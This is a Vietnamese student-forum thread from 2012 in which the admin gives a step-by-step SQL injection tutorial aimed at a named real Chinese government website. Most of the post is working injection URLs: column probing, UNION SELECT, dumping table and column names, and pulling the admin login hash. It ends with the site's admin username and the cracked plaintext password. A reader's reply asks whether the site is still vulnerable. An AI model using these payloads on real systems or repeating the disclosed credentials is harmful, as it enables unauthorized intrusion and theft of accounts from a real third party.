Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM
Chào mừng Khách viếng thăm đến với diễn đàn học sinh trường TCXD. TPHCM. Các bạn hãy đăng ký thành viên để tiện cho việc xem bài viết nhé. Cám ơn các bạn!!!
Hướng dẫn Hack Site lỗi SQL 14 Hướng dẫn Hack Site lỗi SQL 14
Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM
Chào mừng Khách viếng thăm đến với diễn đàn học sinh trường TCXD. TPHCM. Các bạn hãy đăng ký thành viên để tiện cho việc xem bài viết nhé. Cám ơn các bạn!!!
Hướng dẫn Hack Site lỗi SQL 14 Hướng dẫn Hack Site lỗi SQL 14

Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM

Mỗi một thành viên là một viên gạch xây dựng diễn đàn
 
Trang ChínhTìm kiếmLatest imagesĐăng kýĐăng NhậpPhotoshop  Online
News & Announcements
 Admin (200)
 lethuy_daotaoxaydung (157)
 solle bilo (86)
 nguyenhai777 (86)
 ĐàmDuyên (51)
 chaichai (31)
 phankalee (23)
 bucghe (20)
 cantlive (16)
 Black_Pig (12)

Hướng dẫn Hack Site lỗi SQLXem chủ đề cũ hơn Xem chủ đề mới hơn Go down
Mon Jan 02, 2012 4:55 pm
Trụ Cột Của Giúp Đỡ
Hướng dẫn Hack Site lỗi SQL Bgavat18
Hướng dẫn Hack Site lỗi SQL Bgavat10Hướng dẫn Hack Site lỗi SQL Bgavat12Hướng dẫn Hack Site lỗi SQL Bgavat13
Hướng dẫn Hack Site lỗi SQL Bgavat15AdminHướng dẫn Hack Site lỗi SQL Bgavat17
Hướng dẫn Hack Site lỗi SQL Bgavat19Hướng dẫn Hack Site lỗi SQL Bgavat21Hướng dẫn Hack Site lỗi SQL Bgavat22
4R HS Trường TCXD.TPHCM - Admin-
Tổng số bài gửi : 200
Thanked : 79
Join date : 23/11/2011
Age : 33
Đến từ : Khu dân cư Gamer
Châm ngôn sống : Trụ Cột Của Giúp Đỡ
Comments : YH: honma_battri2000

Tài Sản
Huy Chương:
Profile Admin
Tổng số bài gửi : 200
Thanked : 79
Join date : 23/11/2011
Age : 33
Đến từ : Khu dân cư Gamer
Châm ngôn sống : Trụ Cột Của Giúp Đỡ
Comments : YH: honma_battri2000

Hướng dẫn Hack Site lỗi SQL Vide10

Bài gửiTiêu đề: Hướng dẫn Hack Site lỗi SQL
https://tcxd.forumvi.com

Tiêu đề: Hướng dẫn Hack Site lỗi SQL

Bài hướng dẫn này là 1 site bị lỗi SQL.
Và xin nói trước mình chỉ hướng dẫn để các bạn biết thôi chứ ko nên quậy phá người ta nhé

Victim: http://ykzzb.gov.cn <= Site của Trung Quốc (sr các bạn nào là người TQ)

http://ykzzb.gov.cn/newsinfo.php?id=4033 <= chọn đại 1 mục bất kỳ nó ra như sau id=4033

ko có bị lỗi và hình demo đây

Hướng dẫn Hack Site lỗi SQL 310

Tiếp theo ta tìm lỗi bằng cách thêm dấu " 4033' " hoặc dấu " -4033 ".
Nhớ để ý cái dấu nhé

http://ykzzb.gov.cn/newsinfo.php?id=-4033

và chữ mất bớt đi.
Bạn nên chú ý 2 hình nhé, đều cùng 1 site nhưng khác nhau chổ "id=4033" và "id=-4033"


Hướng dẫn Hack Site lỗi SQL 410

Khi tìm được lỗi thì ta dùng câu lệnh ORDER BY 1-- -

http://ykzzb.gov.cn/newsinfo.php?id=-4033 order by 1-- - <= site bình thường

Giải thích: 1-- là số cột đầu tiên để thăm dò lỗi
Dấu - đằng sau là tránh bị ghi log, bạn cũng có thể thay bằng tên cũng được.

vd: http://ykzzb.gov.cn/newsinfo.php?id=-4033 order by 1-- Martin™

http://ykzzb.gov.cn/newsinfo.php?id=-4033 order by 10-- - <= site lỗi.
Cái chủ yếu của chúng ta là tìm ra những cột nào ko bị lỗi.
Ta Order 10 thì bị lỗi giờ ta lùi Order lại nhé


http://ykzzb.gov.cn/newsinfo.php?id=-4033 order by 9-- - <= site lỗi.

http://ykzzb.gov.cn/newsinfo.php?id=-4033 order by 7-- - <= site lỗi.

http://ykzzb.gov.cn/newsinfo.php?id=-4033 order by 6-- - <= site bình thường.

=> vậy chúng ta có 6 cột ko bị lỗi
Giờ ta dùng lệnh UNIONSELECT để xem cột lỗi


http://ykzzb.gov.cn/newsinfo.php?id=-4033 UNION SELECT 1,2,3,4,5,6-- -

Sau khi làm xong câu lệnh và nhấn enter thì ta tìm được các cột cần lấy:
=> 6,2,5,3,4 (mình lấy theo thứ tự từ trên xuống)

demo ảnh:
Hướng dẫn Hack Site lỗi SQL 510

Bước tiếp theo ta chọn đại 1 số để lấy VERSION SITE. Tớ chọn đại số 2 nhé.
Vẫn tại site đó nhưng ta dời trỏ chuột lại con số 2 và làm thao tác thế này


http://ykzzb.gov.cn/newsinfo.php?id=-4033 UNION SELECT 1,version(),3,4,5,6-- -

Xuất hiện version: 5.0.77. Ra Ver 5 thì dễ, ra Ver 4 thì khó à.
demo ảnh:
Hướng dẫn Hack Site lỗi SQL 610

Tìm được Version giờ ta tìm TABLE_NAME:
Vẫn site cũ, các bạn chú ý xem câu lệnh nhé


http://ykzzb.gov.cn/newsinfo.php?id=-4033 UNION SELECT 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- -

Tìm Version cột nào thì Table_name cột đó. Và kết quả là ta tìm được 1 đống cột chứ ADMIN

administrator,administrator77,administrator8,administrator9

cdb_access,cdb_activities,cdb_activityapplies,cdb_adminactions,cdb_admincustom,cdb_admingroups,cdb_adminnotes

cdb_adminsessions,cdb_advcaches,cdb_advertisements,cdb_announcements,cdb_attachments

cdb_attachpaymentlog,cdb_attachtypes,cdb_banned,cdb_bbcodes,cdb_buddys,cdb_caches,cdb_


Hướng dẫn Hack Site lỗi SQL 710

Giờ ta lấy cột administrator

Câu lệnh tiếp theo các bạn cần làm là:

http://ykzzb.gov.cn/newsinfo.php?id=-4033 UNION SELECT 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=0x61646d696e6973747261746f72-- -

Ta tìm được cột id và pass: id,uid,pwd,sdate

Lấy cái này: uid,pwd

Hướng dẫn Hack Site lỗi SQL 810

0x61646d696e6973747261746f72 = 0xadministrator

Mình đã mã hoá từ administrator thành 61646d696e6973747261746f72

Tiếp theo ta lấy ID và PASS của ADMIN

http://ykzzb.gov.cn/newsinfo.php?id=-4033 UNION SELECT 1,group_concat(uid,0x2f,pwd),3,4,5,6 from administrator-- -

Lúc nảy ta tìm được cột administrator. Nên sau từ From ta trả nó về administrator
Và kết quả của chúng ta đây


Hướng dẫn Hack Site lỗi SQL 910

ID: admin
Pass: 7fef6171469e80d32c0559f88b377245 (đã bị mã hoá).
Giải mã: 7fef6171469e80d32c0559f88b377245 = admin988
Dùng trang web sau giải mã http://md5decrypter.co.uk/


Kết thúc bài học hôm nay. Bài học chỉ mang tính chất tham khảo ko nên áp dụng cho việc đen tối.

Video Tut quay lại cách Hack Site. Các bạn xem nhé


----------------------------------------------------------The End----------------------------------------------------------

Tài Sản Của Admin
Tài Sản
Huy Chương:

Chữ Ký Của Admin

Wed May 02, 2012 10:16 pm
Hãy yêu sách, sách là nguồn kiến thức vô tận. Chỉ có kiến thức mới là con đường sống
Hướng dẫn Hack Site lỗi SQL Bgavat18
Hướng dẫn Hack Site lỗi SQL Bgavat10Hướng dẫn Hack Site lỗi SQL Bgavat12Hướng dẫn Hack Site lỗi SQL Bgavat13
Hướng dẫn Hack Site lỗi SQL Bgavat15Hướng dẫn Hack Site lỗi SQL Bgavat17
Hướng dẫn Hack Site lỗi SQL Bgavat19Hướng dẫn Hack Site lỗi SQL Bgavat21Hướng dẫn Hack Site lỗi SQL Bgavat22
4R HS Trường TCXD.TPHCM - nonebody-
Tổng số bài gửi : 2
Thanked : 0
Join date : 02/05/2012
Châm ngôn sống : Hãy yêu sách, sách là nguồn kiến thức vô tận. Chỉ có kiến thức mới là con đường sống
Profile nonebody
Tổng số bài gửi : 2
Thanked : 0
Join date : 02/05/2012
Châm ngôn sống : Hãy yêu sách, sách là nguồn kiến thức vô tận. Chỉ có kiến thức mới là con đường sống

Hướng dẫn Hack Site lỗi SQL Vide10

Bài gửiTiêu đề: Re: Hướng dẫn Hack Site lỗi SQL

Tiêu đề: Hướng dẫn Hack Site lỗi SQL

Sao e test thử hok đc nhỉ:( Site này fix chưa a?

Tài Sản Của nonebody
Chữ Ký Của nonebody


Hướng dẫn Hack Site lỗi SQL

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang
Trang 1 trong tổng số 1 trang
* Không dùng những ngôn từ thiếu lịch sự.
* Bài viết sưu tầm nên ghi rõ nguồn.
* Tránh spam nhảm không liên quan đến chủ đề.

Yêu cầu viết tiếng Việt có dấu.


Permissions in this forum:Bạn không có quyền trả lời bài viết
Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM :: Khu Vực Dành Cho Dân I Tờ :: Khu Vực C.E.H-
Click ChatBox Ver 2 [?] - Online [?]
frontpage stats
Designer By Martin™
Free forum | ©phpBB | Free forum support | Báo cáo lạm dụng | Thảo luận mới nhất